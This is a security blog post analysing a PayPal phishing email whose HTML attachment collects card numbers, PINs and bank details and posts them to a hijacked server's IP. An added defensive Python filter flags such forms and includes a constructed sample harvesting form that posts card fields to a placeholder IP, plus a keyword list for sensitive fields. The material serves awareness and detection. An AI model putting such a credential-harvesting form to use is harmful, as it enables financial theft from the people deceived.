PayPal Phishing
PayPal phishing remains rather commonplace among all of the institutions being phished out there today. The delivery schemes do tend to change and morph throughout the year, and today's example proves that. Today, the attackers are using HTML attachments to deliver their payloads.
Of course, this attack begins in your inbox as an email purporting to come from "support[dot]com" with the subject "Account Review". The body of the email gives the same old song and dance routine, saying that "We have observed activity in this account that is unusual or potentially high risk." and that they have locked your PayPal account. The From field should be hint number one that you're dealing with a scammer, aside from the fact that you received this email in the first place. You might theorize that if you were to receive an email about your PayPal account, it would actually come from PayPal.
The email goes on to instruct you on how to verify your account, and that is done by opening the attached .html document and filling out a form.
The form has several fields into which you are to add some of the usual personal information, such as your name (which you'd think they'd know already), credit card number, expiration date, PIN number, and bank name. After that, you are to simply click the submit button on the page. Your information is then posted to an IP address, and the bad guys have your info.
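As an added example (not part of the original post), here is one way a mail filter could flag this kind of attachment: parse the HTML, and report any form that collects card or bank fields and posts them to a raw IP address. The sample markup, its field names, the hint list, and the address 192.0.2.10 (a documentation range) are constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed name fragments suggesting a field asks for card or bank data.
SENSITIVE_HINTS = ("card", "cvv", "pin", "exp", "bank", "ssn", "password")

class FormAuditor(HTMLParser):
    """Collects each form's action URL and the names of its input fields."""
    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per <form>: {"action", "fields"}
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            name = attrs.get("name") or attrs.get("id") or ""
            self._current["fields"].append(name.lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def ip_literal_host(action):
    """Return the host if the action URL targets a raw IP address, else None."""
    try:
        host = urlparse(action).hostname or ""
        ipaddress.ip_address(host)   # raises ValueError for names or empty host
        return host
    except ValueError:
        return None

def audit_attachment(html_text):
    """List forms that send sensitive-looking fields to an IP-literal URL."""
    parser = FormAuditor()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        host = ip_literal_host(form["action"])
        hits = sorted({f for f in form["fields"]
                       if any(h in f for h in SENSITIVE_HINTS)})
        if host and hits:
            findings.append({"action": form["action"], "host": host, "fields": hits})
    return findings

# Constructed sample resembling the attachment described above.
SAMPLE = ('<form method="post" action="http://192.0.2.10/save.php">'
          '<input name="fullname"><input name="cardnumber"><input name="expdate">'
          '<input name="pin"><input name="bankname"><input type="submit"></form>')
```

Forms that post to a hostname, or that post to an IP address without any sensitive-looking fields, are not reported, which keeps the check narrow enough to use as a quarantine signal.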
At the other end of this IP address, I'm used to finding what appears to be a blank page, or a mom and pop website that has been secretly hijacked and used to store people's PI until the scammer stops back in to pick it up. This time, instead, the IP belongs to a company called Trixbox. It is actually a user interface for managing VoIP connections, specifically an Asterisk-based open source VoIP option. Finding someone to contact has not been an easy task, but we are working on trying to find someone on the other end to take this information down.
